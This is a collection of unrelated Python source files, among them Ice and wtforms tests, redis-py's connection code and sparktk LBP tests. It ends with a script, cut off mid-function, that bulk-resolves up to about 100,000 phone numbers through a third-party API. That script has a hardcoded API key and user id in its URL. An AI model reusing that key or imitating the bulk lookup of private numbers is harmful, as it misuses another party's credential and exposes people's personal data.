        if current.id.name == "locate":
            self.exception(current)
        #
        # Ensure locate() is only called once per request.
        #
        test(self._requestId == -1)
        self._requestId = current.requestId
        return (TestI(), CookieI())
    def finished(self, current, servant, cookie):
        test(not self._deactivated)
        #
        # Ensure finished() is only called once per request.
        #
        test(self._requestId == current.requestId)
        self._requestId = -1
        test(current.id.category == self._category or self._category == "")
        test(current.id.name == "locate" or current.id.name == "finished")
        # Object name "finished" means: throw from finished().
        if current.id.name == "finished":
            self.exception(current)
        # Verify the cookie created in locate() arrived intact.
        test(isinstance(cookie, Test.Cookie))
        test(cookie.message() == 'blahblah')
    def deactivate(self, category):
        test(not self._deactivated)
        self._deactivated = True
    def exception(self, current):
        # Map the invoked operation to the exception the test expects.
        if current.operation == "ice_ids":
            raise Test.TestIntfUserException()
        elif current.operation == "requestFailedException":
            raise Ice.ObjectNotExistException()
        elif current.operation == "unknownUserException":
            raise Ice.UnknownUserException("reason")
        elif current.operation == "unknownLocalException":
            raise Ice.UnknownLocalException("reason")
        elif current.operation == "unknownException":
            raise Ice.UnknownException("reason")
        elif current.operation == "userException":
            raise Test.TestIntfUserException()
        elif current.operation == "localException":
            raise Ice.SocketException(0)
        elif current.operation == "pythonException":
            raise RuntimeError("message")
        elif current.operation == "unknownExceptionWithServantException":
            raise Ice.UnknownException("reason")
        elif current.operation == "impossibleException":
            raise Test.TestIntfUserException() # Yes, it really is meant to be TestIntfUserException.
        elif current.operation == "intfUserException":
            raise Test.TestImpossibleException() # Yes, it really is meant to be TestImpossibleException.
        elif current.operation == "asyncResponse":
            raise Test.TestImpossibleException()
        elif current.operation == "asyncException":
            raise Test.TestImpossibleException()
| joshmoore/zeroc-ice | py/test/Ice/servantLocator/TestI.py | Python | gpl-2.0 | 4,959 |
import pytest
from tests.common import DummyPostData
from wtforms import validators
from wtforms.fields import FormField
from wtforms.fields import StringField
from wtforms.form import Form
class AttrDict:
    """Minimal attribute bag: constructor arguments become attributes."""

    def __init__(self, *args, **kw):
        for key, value in dict(*args, **kw).items():
            setattr(self, key, value)
class ClassWithProperty(AttrDict):
    """AttrDict whose 'a' attribute is a property backed by the 'a_' dict.

    Reading 'a' wraps the stored dict in a fresh AttrDict (an empty one
    when nothing is set); writing 'a' stores vars(value) into 'a_'.
    """

    @property
    def a(self):
        # A new AttrDict per access: mutating the returned object does not
        # change a_ unless the whole object is assigned back.
        return AttrDict(self.a_) if getattr(self, "a_", None) else AttrDict()
    @a.setter
    def a(self, value):
        self.a_ = vars(value)
def make_form(name="F", **fields):
    """Dynamically create a Form subclass called *name* with *fields*."""
    return type(str(name), (Form,), dict(fields))
@pytest.fixture
def F1():
    # Outer form wrapping an inner form via FormField, default '-' separator.
    F = make_form(
        a=StringField(validators=[validators.DataRequired()]), b=StringField()
    )
    return make_form("F1", a=FormField(F))
@pytest.fixture
def F2():
    # Same inner form, but with a custom '::' FormField separator.
    F = make_form(
        a=StringField(validators=[validators.DataRequired()]), b=StringField()
    )
    return make_form("F2", a=FormField(F, separator="::"))
def test_formdata(F1):
    # Nested field names use the '-' separator and bind from post data.
    form = F1(DummyPostData({"a-a": ["moo"]}))
    assert form.a.form.a.name == "a-a"
    assert form.a["a"].data == "moo"
    assert form.a["b"].data is None
    assert form.validate()
def test_iteration(F1):
    # Iterating a FormField yields the inner form's fields in order.
    assert [x.name for x in F1().a] == ["a-a", "a-b"]
def test_with_obj(F1):
    # Object binding reads nested attributes...
    obj = AttrDict(a=AttrDict(a="mmm"))
    form = F1(obj=obj)
    assert form.a.form.a.data == "mmm"
    assert form.a.form.b.data is None
    # ...and populate_obj writes back into the existing nested object.
    obj_inner = AttrDict(a=None, b="rawr")
    obj2 = AttrDict(a=obj_inner)
    form.populate_obj(obj2)
    assert obj2.a is obj_inner
    assert obj_inner.a == "mmm"
    assert obj_inner.b is None
def test_widget(F1):
    # Default widget renders the inner form as a table of rows.
    assert F1().a() == (
        '<table id="a">'
        '<tr><th><label for="a-a">A</label></th>'
        '<td><input id="a-a" name="a-a" required type="text" value=""></td></tr>'
        '<tr><th><label for="a-b">B</label></th>'
        '<td><input id="a-b" name="a-b" type="text" value=""></td></tr>'
        "</table>"
    )
def test_separator(F2):
    # With a custom separator, only 'a::a' (not 'a-a') binds the inner field.
    form = F2(DummyPostData({"a-a": "fake", "a::a": "real"}))
    assert form.a.a.name == "a::a"
    assert form.a.a.data == "real"
    assert form.validate()
def test_no_validators_or_filters(F1):
    """FormField rejects validators, filters, and inline validate_* hooks."""
    class A(Form):
        a = FormField(F1, validators=[validators.DataRequired()])
    with pytest.raises(TypeError):
        A()
    class B(Form):
        a = FormField(F1, filters=[lambda x: x])
    with pytest.raises(TypeError):
        B()
    class C(Form):
        a = FormField(F1)
        def validate_a(self, field):
            pass
    form = C()
    # The error is only raised when validation actually runs.
    with pytest.raises(TypeError):
        form.validate()
def test_populate_missing_obj(F1):
    """populate_obj fails when there is no candidate object to populate."""
    obj = AttrDict(a=None)
    obj2 = AttrDict(a=AttrDict(a="mmm"))
    form = F1()
    # No inner object on obj and no _obj on the unbound form -> TypeError.
    with pytest.raises(TypeError):
        form.populate_obj(obj)
    form.populate_obj(obj2)
def test_populate_property(F1):
    """populate_obj writes through a property, updating its backing storage."""
    obj1 = ClassWithProperty(a_={"a": "old_a", "b": "old_b"})
    form = F1(DummyPostData({"a-a": "new_a", "a-b": "new_b"}))
    form.populate_obj(obj1)
    assert obj1.a_ == {"a": "new_a", "b": "new_b"}
    # An object whose property has no backing value yet must also end up
    # populated.  (Bug fix: this previously re-asserted obj1.a_, so obj2
    # was never actually checked.)
    obj2 = ClassWithProperty()
    form.populate_obj(obj2)
    assert obj2.a_ == {"a": "new_a", "b": "new_b"}
| wtforms/wtforms | tests/fields/test_form.py | Python | bsd-3-clause | 3,172 |
# SPDX-License-Identifier: GPL-3.0-or-later
# Copyright 2014-2022 Mikhail Rachinskiy
from collections.abc import Iterable
from bpy.types import Object
from .. import lib
def offset_simple(self, obs: Iterable[Object]) -> None:
    """Offset animation data of *obs*, bumping the offset once per group
    of ``self.threshold`` successfully shifted objects."""
    shift = 0
    members = 1
    for ob in obs:
        # Objects without animation data are not counted toward the group.
        if ad_offset(self, ob, shift) is False:
            continue
        if members >= self.threshold:
            shift += self.offset
            members = 1
        else:
            members += 1
def ad_offset(self, ob: Object, offset: float) -> bool:
    """Shift all animation data (F-Curves and NLA strips) on *ob* so it
    starts at ``self.frame + offset``.

    Returns True when the object had any animation to shift, else False.
    """
    ads = lib.ad_get(ob, self.use_ob, self.use_data, self.use_sk, self.use_mat)
    if not ads:
        return False
    # F-Curves
    fcus_frame_start = []
    for ad in ads:
        if ad.action:
            for fcu in ad.action.fcurves:
                fcus_frame_start.append(fcu.range()[0])
    if fcus_frame_start:
        fcu_offset = self.frame - min(fcus_frame_start) + offset
        for ad in ads:
            # Bug fix: an animation-data block may have no action (e.g.
            # NLA-only); the original second pass dereferenced
            # ad.action.fcurves unguarded and could raise AttributeError.
            if not ad.action:
                continue
            for fcu in ad.action.fcurves:
                for kp in fcu.keyframe_points:
                    kp.co[0] += fcu_offset
                    kp.handle_left[0] += fcu_offset
                    kp.handle_right[0] += fcu_offset
    # NLA
    strips_frame_start = []
    for ad in ads:
        for track in ad.nla_tracks:
            for strip in track.strips:
                strips_frame_start.append(strip.frame_start)
    if strips_frame_start:
        min_frame_start = min(strips_frame_start)
        strip_offset = self.frame - min_frame_start + offset
        # Reverse iteration order in this case -- presumably to avoid
        # transient strip overlaps while moving; TODO confirm.
        use_rev = min_frame_start < self.frame + strip_offset
        for ad in ads:
            for track in ad.nla_tracks:
                strips = reversed(track.strips) if use_rev else track.strips
                for strip in strips:
                    if use_rev:
                        strip.frame_end += strip_offset
                        strip.frame_start += strip_offset
                        strip.frame_end = strip.frame_end  # Trigger update for strip scale value
                    else:
                        strip.frame_start += strip_offset
                        strip.frame_end += strip_offset
    return bool(fcus_frame_start) or bool(strips_frame_start)
| mrachinskiy/commotion | op_offset/offset_ad.py | Python | gpl-3.0 | 2,297 |
import os
from src.readers.experimentxmlreader import ExperimentXMLReader
from src.readers.qtreexmlreader import QTreeXMLReader
from src.writer import Writer
RESOURCES_DIR = "/Users/alcemirsantos/Documents/Workspace/prophet-reader/resources"
ANSWERS_DIR = "/Users/alcemirsantos/Dropbox/PhD/activities/experiments/16-FOSD12 Replication/VICC2 - RiSE/Answers"
ANSWER_FILENAME = "answers.xml"
TEST_XMLFILES = ["FH.xml", "IFDEF.xml"]
data = []
def get_list_of_answers_files():
    """Walk ANSWERS_DIR and collect every file named like ANSWER_FILENAME."""
    filenames = []
    for subdir, dirs, files in os.walk(ANSWERS_DIR):
        for filename in files:
            filepath = subdir + os.sep + filename
            if filepath.endswith(ANSWER_FILENAME):
                # NOTE(review): subdir already starts with ANSWERS_DIR, so
                # joining with ANSWERS_DIR again is redundant (join discards
                # the first part when the second is absolute) -- confirm.
                filenames.append(os.path.join(ANSWERS_DIR, filepath))
            else:
                print "<> Disregarding: "+filepath
    return filenames
def get_list_of_testfiles():
    """Return the absolute path of each sample XML file, echoing each one."""
    paths = []
    for xml_name in TEST_XMLFILES:
        full_path = os.path.join(RESOURCES_DIR, xml_name)
        print(full_path)
        paths.append(full_path)
    return paths
def process_experiment_xmlfile():
    """Parse every answers file with ExperimentXMLReader and persist a summary."""
    for filename in get_list_of_answers_files():
        print "\n<> Processing: " + filename
        reader = ExperimentXMLReader(filename)
        # Results accumulate in the module-level `data` list.
        data.append(reader.process())
        # reader.walk()
    writer = Writer()
    writer.persist_summary(data)
def process_qtree_xmlfile():
    """Parse every answers file with QTreeXMLReader and persist a summary."""
    for filename in get_list_of_answers_files():
        print "\n<> Processing: "+filename
        reader = QTreeXMLReader(filename)
        # Results accumulate in the module-level `data` list.
        data.append(reader.process())
    writer = Writer()
    writer.persist_summary(data)
process_qtree_xmlfile() | alcemirsantos/prophet-reader | src/main.py | Python | gpl-3.0 | 1,607 |
import logging
from datetime import datetime, timedelta
from healthysnake.levels import HARD
class Dependency:
    """An individual dependency of the system.

    Wraps a health-check callable and caches its result; ``healthy()``
    re-runs the check only once ``interval`` has elapsed.
    """
    STATE_HEALTHY = 'healthy'
    STATE_UNHEALTHY = 'unhealthy'
    DEFAULT_INTERVAL = 10
    def __init__(self, name, check_func,
                 interval=timedelta(seconds=DEFAULT_INTERVAL), level=HARD, logger=logging.getLogger(__name__)):
        """Initialise a new dependency.
        :param name: name of the dependency
        :type name: str
        :param check_func: health check function returning either a bool or
            a ``(healthy, message)`` tuple
        :type check_func: callable
        :param interval: interval by which to update the state
        :type interval: datetime.timedelta
        :param level: severity level of the dependency
        :type level: int
        :param logger: logger for messaging
        :type logger: logging.Logger
        """
        self.name = name
        self.last_updated = datetime.utcnow()
        self.level = level
        self._check = check_func
        self._interval = interval
        self._healthy = True
        self._message = ''
        self._logger = logger
        # Run the check once so the state never reports an unchecked default.
        self.update()
    def __str__(self):
        """Return a string representation of the dependency.
        :rtype: str
        """
        return '{name} [state={state}, level={level}]'.format(
            name=self.name, state=self._state_str(), level=self.level)
    def _state_str(self):
        """
        Return appropriate string according to dependency health.
        :return: healthy / unhealthy string const
        :rtype: str
        """
        return self.STATE_HEALTHY if self._healthy else self.STATE_UNHEALTHY
    def update(self):
        """Run the health check and refresh the cached state."""
        try:
            checked_data = self._check()
            # Normalise a bare bool into a (healthy, message) pair.
            # isinstance replaces the previous `type(x) == bool` comparison.
            if isinstance(checked_data, bool):
                checked_data = (checked_data, '')
            # A malformed return value raises below and is treated as a
            # failed check rather than crashing the caller.
            self._healthy = checked_data[0]
            self._message = checked_data[1]
        except Exception as e:
            self._healthy = False
            self._logger.exception(e)
        self.last_updated = datetime.utcnow()
    def healthy(self):
        """Retrieve the current health of the dependency.
        :return: current health
        :rtype: tuple(bool, str)
        """
        if self.due():
            self.update()
        return self._healthy, self._message
    def due(self):
        """Check whether the dependency is due to update health status.
        :return: true if due to update
        :rtype: bool
        """
        return datetime.utcnow() > self.next_update()
    def next_update(self):
        """Calculate the next update time.
        :return: the next update time
        :rtype: datetime.datetime
        """
        return self.last_updated + self._interval
| dammitjim/healthysnake | healthysnake/dependency.py | Python | mit | 2,881 |
from rest_framework.renderers import BrowsableAPIRenderer
class BrowsableAPIRendererWithoutForms(BrowsableAPIRenderer):
    """Browsable-API renderer with every HTML form suppressed."""

    def get_context(self, *args, **kwargs):
        # Start from the stock context, then switch the edit forms off.
        context = super().get_context(*args, **kwargs)
        context.update(display_edit_forms=False)
        return context

    def show_form_for_method(self, view, method, request, obj):
        """Forms are never shown, regardless of method."""
        return False

    def get_rendered_html_form(self, data, view, method, request):
        """Return an empty string instead of any rendered form HTML."""
        return ""
| django-json-api/rest_framework_ember | example/utils.py | Python | bsd-2-clause | 717 |
from tempfile import TemporaryFile
import pytest
from imgpy import Img
@pytest.mark.parametrize('image', ({
    'sub': 'anima/bordered.gif',
    'angle': 90
}, {
    'sub': 'anima/clear.gif',
    'angle': 90
}, {
    'sub': 'fixed/bordered.jpg',
    'angle': 90
}, {
    'sub': 'fixed/clear.jpg',
    'angle': 90
}, ))
def test_rotate(path, image):
    """Rotate each fixture in place, save, reload, and check the reloaded
    size and frame count match the rotated source."""
    with Img(fp=path(image['sub'])) as src, TemporaryFile() as tf:
        src.rotate(image['angle'], expand=True)
        src.save(fp=tf)
        with Img(fp=tf) as dest:
            assert (dest.width, dest.height, dest.frame_count) == (
                src.width, src.height, src.frame_count)
| embali/imgpy | tests/test_rotate.py | Python | mit | 649 |
import errno
import socket
from itertools import chain, imap
from redis.exceptions import ConnectionError, ResponseError, InvalidResponse
class PythonParser(object):
    """Pure-Python reader for the Redis wire protocol (RESP)."""
    def __init__(self):
        self._fp = None
    def on_connect(self, connection):
        "Called when the socket connects"
        self._fp = connection._sock.makefile('r')
    def on_disconnect(self):
        "Called when the socket disconnects"
        if self._fp is not None:
            self._fp.close()
            self._fp = None
    def read(self, length=None):
        """
        Read a line from the socket if no length is specified,
        otherwise read ``length`` bytes. Always strip away the newlines.
        """
        try:
            if length is not None:
                # +2 covers the trailing CRLF, which the slice removes.
                return self._fp.read(length+2)[:-2]
            return self._fp.readline()[:-2]
        except (socket.error, socket.timeout), e:
            raise ConnectionError("Error while reading from socket: %s" % \
                (e.args,))
    def read_response(self):
        # Parse one reply; the first byte selects the RESP reply type.
        response = self.read()
        if not response:
            raise ConnectionError("Socket closed on remote end")
        byte, response = response[0], response[1:]
        # server returned an error
        if byte == '-':
            if response.startswith('ERR '):
                response = response[4:]
            return ResponseError(response)
            # NOTE(review): the LOADING branch below appears unreachable
            # after the return above -- confirm the intended ordering.
            if response.startswith('LOADING '):
                # If we're loading the dataset into memory, kill the socket
                # so we re-initialize (and re-SELECT) next time.
                raise ConnectionError("Redis is loading data into memory")
        # single value
        elif byte == '+':
            return response
        # int value
        elif byte == ':':
            return long(response)
        # bulk response
        elif byte == '$':
            length = int(response)
            if length == -1:
                # RESP encodes a nil bulk reply as length -1.
                return None
            response = self.read(length)
            return response
        # multi-bulk response
        elif byte == '*':
            length = int(response)
            if length == -1:
                return None
            return [self.read_response() for i in xrange(length)]
        raise InvalidResponse("Protocol Error")
class HiredisParser(object):
    """Reply parser backed by the C-accelerated ``hiredis`` reader."""
    def on_connect(self, connection):
        self._sock = connection._sock
        self._reader = hiredis.Reader(
            protocolError=InvalidResponse,
            replyError=ResponseError)
    def on_disconnect(self):
        self._sock = None
        self._reader = None
    def read_response(self):
        # hiredis returns False while it needs more bytes to complete a reply.
        response = self._reader.gets()
        while response is False:
            try:
                buffer = self._sock.recv(4096)
            except (socket.error, socket.timeout), e:
                raise ConnectionError("Error while reading from socket: %s" % \
                    (e.args,))
            if not buffer:
                raise ConnectionError("Socket closed on remote end")
            self._reader.feed(buffer)
            # if the data received doesn't end with \r\n, then there's more in
            # the socket
            if not buffer.endswith('\r\n'):
                continue
            response = self._reader.gets()
        return response
# Prefer the C-accelerated hiredis reader when the module is installed;
# otherwise fall back to the pure-Python parser above.
try:
    import hiredis
    DefaultParser = HiredisParser
except ImportError:
    DefaultParser = PythonParser
class Connection(object):
    "Manages TCP communication to and from a Redis server"
    def __init__(self, host='localhost', port=6379, db=0, password=None,
                 socket_timeout=None, encoding='utf-8',
                 encoding_errors='strict', parser_class=DefaultParser):
        self.host = host
        self.port = port
        self.db = db
        self.password = password
        self.socket_timeout = socket_timeout
        self.encoding = encoding
        self.encoding_errors = encoding_errors
        # The socket is created lazily on first use (see connect()).
        self._sock = None
        self._parser = parser_class()
    def connect(self):
        "Connects to the Redis server if not already connected"
        if self._sock:
            return
        try:
            sock = self._connect()
        except socket.error, e:
            raise ConnectionError(self._error_message(e))
        self._sock = sock
        self.on_connect()
    def _connect(self):
        "Create a TCP socket connection"
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(self.socket_timeout)
        sock.connect((self.host, self.port))
        return sock
    def _error_message(self, exception):
        # args for socket.error can either be (errno, "message")
        # or just "message"
        if len(exception.args) == 1:
            return "Error connecting to %s:%s. %s." % \
                (self.host, self.port, exception.args[0])
        else:
            return "Error %s connecting %s:%s. %s." % \
                (exception.args[0], self.host, self.port, exception.args[1])
    def on_connect(self):
        "Initialize the connection, authenticate and select a database"
        self._parser.on_connect(self)
        # if a password is specified, authenticate
        if self.password:
            self.send_command('AUTH', self.password)
            if self.read_response() != 'OK':
                raise ConnectionError('Invalid Password')
        # if a database is specified, switch to it
        if self.db:
            self.send_command('SELECT', self.db)
            if self.read_response() != 'OK':
                raise ConnectionError('Invalid Database')
    def disconnect(self):
        "Disconnects from the Redis server"
        self._parser.on_disconnect()
        if self._sock is None:
            return
        try:
            self._sock.close()
        except socket.error:
            pass
        self._sock = None
    def _send(self, command):
        "Send the command to the socket"
        if not self._sock:
            self.connect()
        try:
            self._sock.sendall(command)
        except socket.error, e:
            # A broken pipe means the server closed on us; drop the socket
            # so the next send reconnects.
            if e.args[0] == errno.EPIPE:
                self.disconnect()
            if len(e.args) == 1:
                _errno, errmsg = 'UNKNOWN', e.args[0]
            else:
                _errno, errmsg = e.args
            raise ConnectionError("Error %s while writing to socket. %s." % \
                (_errno, errmsg))
    def send_packed_command(self, command):
        "Send an already packed command to the Redis server"
        try:
            self._send(command)
        except ConnectionError:
            # retry the command once in case the socket connection simply
            # timed out
            self.disconnect()
            # if this _send() call fails, then the error will be raised
            self._send(command)
    def send_command(self, *args):
        "Pack and send a command to the Redis server"
        self.send_packed_command(self.pack_command(*args))
    def read_response(self):
        "Read the response from a previously sent command"
        response = self._parser.read_response()
        # The parser returns (rather than raises) ResponseError instances;
        # raise them here so callers see server errors as exceptions.
        if response.__class__ == ResponseError:
            raise response
        return response
    def encode(self, value):
        "Return a bytestring representation of the value"
        if isinstance(value, unicode):
            return value.encode(self.encoding, self.encoding_errors)
        return str(value)
    def pack_command(self, *args):
        "Pack a series of arguments into a value Redis command"
        # RESP framing: '*<argc>' header, then '$<len>\r\n<value>\r\n' per arg.
        command = ['$%s\r\n%s\r\n' % (len(enc_value), enc_value)
                   for enc_value in imap(self.encode, args)]
        return '*%s\r\n%s' % (len(command), ''.join(command))
class UnixDomainSocketConnection(Connection):
    """Connection variant that talks to Redis over a Unix domain socket."""
    def __init__(self, path='', db=0, password=None,
                 socket_timeout=None, encoding='utf-8',
                 encoding_errors='strict', parser_class=DefaultParser):
        self.path = path
        self.db = db
        self.password = password
        self.socket_timeout = socket_timeout
        self.encoding = encoding
        self.encoding_errors = encoding_errors
        self._sock = None
        self._parser = parser_class()
    def _connect(self):
        "Create a Unix domain socket connection"
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.socket_timeout)
        sock.connect(self.path)
        return sock
    def _error_message(self, exception):
        # args for socket.error can either be (errno, "message")
        # or just "message"
        if len(exception.args) == 1:
            return "Error connecting to unix socket: %s. %s." % \
                (self.path, exception.args[0])
        else:
            return "Error %s connecting to unix socket: %s. %s." % \
                (exception.args[0], self.path, exception.args[1])
# TODO: add ability to block waiting on a connection to be released
class ConnectionPool(object):
    "Generic connection pool"
    def __init__(self, connection_class=Connection, max_connections=None,
                 **connection_kwargs):
        # A falsy max_connections means "effectively unlimited".
        self.connection_class = connection_class
        self.connection_kwargs = connection_kwargs
        self.max_connections = max_connections or 2**31
        self._created_connections = 0
        self._available_connections = []
        self._in_use_connections = set()
    def get_connection(self, command_name, *keys, **options):
        "Check out a pooled connection, creating one when none are idle"
        if self._available_connections:
            connection = self._available_connections.pop()
        else:
            connection = self.make_connection()
        self._in_use_connections.add(connection)
        return connection
    def make_connection(self):
        "Create a brand-new connection, enforcing the pool limit"
        if self._created_connections >= self.max_connections:
            raise ConnectionError("Too many connections")
        self._created_connections += 1
        return self.connection_class(**self.connection_kwargs)
    def release(self, connection):
        "Return a connection previously checked out from this pool"
        self._in_use_connections.remove(connection)
        self._available_connections.append(connection)
    def disconnect(self):
        "Disconnect every connection owned by the pool"
        for connection in chain(self._available_connections,
                                self._in_use_connections):
            connection.disconnect()
| edisonlz/fruit | web_project/base/site-packages/redis/connection.py | Python | apache-2.0 | 10,439 |
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Tests LBP Graphx implementation by comparing results agains graphlab """
import unittest
from sparktkregtests.lib import sparktk_test
class LbpPottsModel(sparktk_test.SparkTKTestCase):
    """Check loopy belief propagation results on small hand-built graphs."""

    def test_lbp_cross_3_state(self):
        """Test 3 state Potts model"""
        vertex_frame = self.context.frame.create(
            [[1, "1.0 0.0 0.0"],
             [2, ".3 .3 .3"],
             [3, "1.0 0.0 0.0"],
             [4, "0.0 1.0 0.0"],
             [5, "0.0 0.0 1.0"]],
            [("id", int),
             ("vertex_weight", str)])
        edge_frame = self.context.frame.create(
            [[2, 3, 1.0],
             [2, 1, 1.0],
             [2, 4, 1.0],
             [2, 5, 1.0]],
            [("src", int),
             ("dst", int),
             ("weight", float)])
        graph = self.context.graph.create(vertex_frame, edge_frame)
        potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
        known_vals = {1: (1.0, 0.0, 0.0),
                      2: (0.57611688, 0.2119415576, 0.2119415576),
                      3: (1.0, 0.0, 0.0),
                      4: (0.0, 1.0, 0.0),
                      5: (0.0, 0.0, 1.0)}
        potts_vals = potts.to_pandas(potts.count())
        for _, row in potts_vals.iterrows():
            # list() so the result is indexable on both Python 2 and 3
            # (a bare map object is not subscriptable on Python 3).
            values = list(map(float, row["posterior"][1:-1].split(",")))
            self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
            self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
            self.assertAlmostEqual(known_vals[row["id"]][2], values[2])

    def test_lbp_cross_50(self):
        """Test a balanced graph"""
        vertex_frame = self.context.frame.create(
            [[1, "1.0 0.0"],
             [2, ".5 .5"],
             [3, "1.0 0.0"],
             [4, "0.0 1.0"],
             [5, "0.0 1.0"]],
            [("id", int),
             ("vertex_weight", str)])
        edge_frame = self.context.frame.create(
            [[2, 3, 1.0],
             [2, 1, 1.0],
             [2, 4, 1.0],
             [2, 5, 1.0]],
            [("src", int),
             ("dst", int),
             ("weight", float)])
        graph = self.context.graph.create(vertex_frame, edge_frame)
        potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
        known_vals = {1: (1.0, 0.0),
                      2: (0.5, 0.5),
                      3: (1.0, 0.0),
                      4: (0.0, 1.0),
                      5: (0.0, 1.0)}
        potts_vals = potts.to_pandas(potts.count())
        for _, row in potts_vals.iterrows():
            values = list(map(float, row["posterior"][1:-1].split(",")))
            self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
            self.assertAlmostEqual(known_vals[row["id"]][1], values[1])

    def test_lbp_cross_3_1(self):
        """Test LBP on a cross with a 3-1 split on the distribution"""
        vertex_frame = self.context.frame.create(
            [[1, "1.0 0.0"],
             [2, "0.5 0.5"],
             [3, "1.0 0.0"],
             [4, "0.0 1.0"],
             [5, "1.0 0.0"]],
            [("id", int),
             ("vertex_weight", str)])
        edge_frame = self.context.frame.create(
            [[2, 3, 1.0],
             [2, 1, 1.0],
             [2, 4, 1.0],
             [2, 5, 1.0]],
            [("src", int),
             ("dst", int),
             ("weight", float)])
        graph = self.context.graph.create(vertex_frame, edge_frame)
        potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
        known_vals = {1: (1.0, 0.0),
                      2: (0.88079707798, 0.119202922),
                      3: (1.0, 0.0),
                      4: (0.0, 1.0),
                      5: (1.0, 0.0)}
        potts_vals = potts.to_pandas(potts.count())
        for _, row in potts_vals.iterrows():
            values = list(map(float, row["posterior"][1:-1].split(",")))
            self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
            self.assertAlmostEqual(known_vals[row["id"]][1], values[1])

    def test_lbp_cross(self):
        """Test lbp on a basic cross with a 4-0 split"""
        vertex_frame = self.context.frame.create(
            [["1", "1.0 0.0"],
             ["2", ".5 .5"],
             ["3", "1.0 0.0"],
             ["4", "1.0 0.0"],
             ["5", "1.0 0.0"]],
            [("id", str), ("vertex_weight", str)])
        edge_frame = self.context.frame.create(
            [["2", "3", 0.5],
             ["2", "1", 0.5],
             ["2", "4", 0.5],
             ["2", "5", 0.5]],
            [("src", str),
             ("dst", str),
             ("weight", float)])
        graph = self.context.graph.create(vertex_frame, edge_frame)
        potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
        known_vals = {"1": (1.0, 0.0),
                      "2": (0.88079707797, 0.11920292202),
                      "3": (1.0, 0.0),
                      "4": (1.0, 0.0),
                      "5": (1.0, 0.0)}
        potts_vals = potts.to_pandas(potts.count())
        for _, row in potts_vals.iterrows():
            values = list(map(float, row["posterior"][1:-1].split(",")))
            self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
            self.assertAlmostEqual(known_vals[row["id"]][1], values[1])

    def test_lbp_double_cross(self):
        """Test lbp on a double cross"""
        vertex_frame = self.context.frame.create(
            [["1", "1.0 0.0", 1, "1.0 0.0"],
             ["2", "0.5 0.5", 0, ""],
             ["3", "1.0 0.0", 1, "1.0 0.0"],
             ["4", "0.0 1.0", 1, "0.0 1.0"],
             ["5", "0.5 0.5", 0, ""],
             ["6", "0.0 1.0", 1, "0.0 1.0"],
             ["7", "0.0 1.0", 1, "0.0 1.0"],
             ["8", "1.0 0.0", 1, "1.0 0.0"]],
            [("id", str),
             ("vertex_weight", str),
             ("is_observed", int), ("label", str)])
        edge_frame = self.context.frame.create(
            [["2", "3", 1.0],
             ["2", "1", 1.0],
             ["2", "4", 1.0],
             ["2", "5", 1.0],
             ["6", "5", 1.0],
             ["7", "5", 1.0],
             ["8", "5", 1.0]],
            [("src", str),
             ("dst", str),
             ("weight", float)])
        graph = self.context.graph.create(vertex_frame, edge_frame)
        potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
        known_vals = {"1": (1.0, 0.0),
                      "2": (0.6378903114, 0.36210968),
                      "3": (1.0, 0.0),
                      "4": (0.0, 1.0),
                      "5": (0.36210968, 0.6378903114),
                      "6": (0.0, 1.0),
                      "7": (0.0, 1.0),
                      "8": (1.0, 0.0)}
        potts_vals = potts.to_pandas(potts.count())
        for _, row in potts_vals.iterrows():
            values = list(map(float, row["posterior"][1:-1].split(",")))
            self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
            self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| grehx/spark-tk | regression-tests/sparktkregtests/testcases/graph/graph_lbp_test.py | Python | apache-2.0 | 8,856 |
import threading
import requests
import csv
import ujson
import queue
def load_data():
    """Read phone numbers (first CSV column, stripped) from ``aa.csv``.

    At most ``count`` + 1 rows are returned, because the loop only breaks
    after the running counter exceeds ``count`` — preserved from the
    original logic.
    """
    fn = "aa.csv"
    res = []
    count = 100000
    # Bug fix: the original also accumulated every number into an unused
    # `tel_set`, wasting memory for no effect; that dead code is removed.
    with open(fn, "r", encoding='utf8') as fh:
        cr = csv.reader(fh)
        for i, line in enumerate(cr, start=1):
            tel = line[0].strip()
            res.append(tel)
            if i > count:
                break
    return res
api_url = 'http://apisi.dianhua.cn/resolvetel/?v=1&apikey=a9vXZcm5dnvimiNXyGNfLFwn37PdpyBB&uid=yulore_bqc&app=yulore_bqc&ver=1.0&tel=%s'
def get_one(q, oq):
    """Worker loop: pull numbers from *q* until a ``None`` sentinel arrives,
    resolve each via the API, and push ``(tel, name)`` pairs onto *oq*."""
    while True:
        tel = q.get()
        # Identity test is the idiomatic sentinel check (was `tel == None`).
        if tel is None:
            break
        resp = requests.get(api_url % tel)
        if resp.status_code == 200:
            ao = ujson.loads(resp.text)
            oq.put((tel, ao.get('name', '')))
        else:
            # Failed lookups still emit a row so every input is accounted for.
            oq.put((tel, ''))
def run(data):
    """Distribute *data* across 20 worker threads and write results to m.csv."""
    q_size = 20
    o_q = queue.Queue()
    # One input queue per worker; all workers share the single output queue.
    q_list = [queue.Queue() for i in range(q_size)]
    t_list = [threading.Thread(target=get_one, args=(q, o_q)) for q in q_list]
    for t in t_list:
        t.start()
    # Round-robin the inputs over the per-worker queues.
    i = 0
    for d in data:
        q_list[i].put(d)
        i = (i+1) % q_size
    # One None sentinel per worker tells it to exit.
    for q in q_list:
        q.put(None)
    for t in t_list:
        t.join()
    # All workers have joined, so a non-blocking drain sees every result.
